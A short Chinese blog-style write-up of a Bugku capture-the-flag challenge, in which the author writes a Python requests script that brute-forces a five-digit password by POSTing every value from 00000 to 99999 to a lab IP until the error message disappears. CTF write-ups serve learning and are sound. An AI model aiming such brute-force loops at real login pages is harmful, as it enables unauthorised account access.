bugku1 py爆破初尝试

B1nz碎碎念 太久不干活的后果就是连自己设置的快捷键都忘光光

参考资料：

https://docs.python-requests.org/zh_CN/latest/user/quickstart.html
https://blog.csdn.net/m0_51641607/article/details/115754083

这道题点进去看到是这样的

简单粗暴的爆破题目

但是here’s the problem

一杯茶一根烟，bp一开爆一天

借此契机来试试看写个py脚本来爆破吧~

先抓个包看看：

ok啦开始写脚本：

这里学习到了一个新函数叫：

str.zfill()

这个

代码如下：

import requests
def bomb():
    url = 'http://114.67.175.224:10583/'
    for i in range(0,99999):
        pwd = str(i)
        pwd = pwd.zfill(5)
        r = requests.post(url, data={'pwd':pwd})
        r.encoding = 'utf-8'
        wrong = "密码不正确，请重新输入"
        if (wrong in r.text):
            print("密码：{},状态码:{},dammn不是这个".format(pwd,r.status_code))
        else:
            print("密码：{},状态码:{},hooray!!".format(pwd,r.status_code))
            print("结束！辛苦了b1nz")
            break

bomb()

有序运行中~

我听了一整张tyga的专都没爆完 疲倦了（香烟）

o可o可

输入得到flag

今天也成功掉发了呢！散会！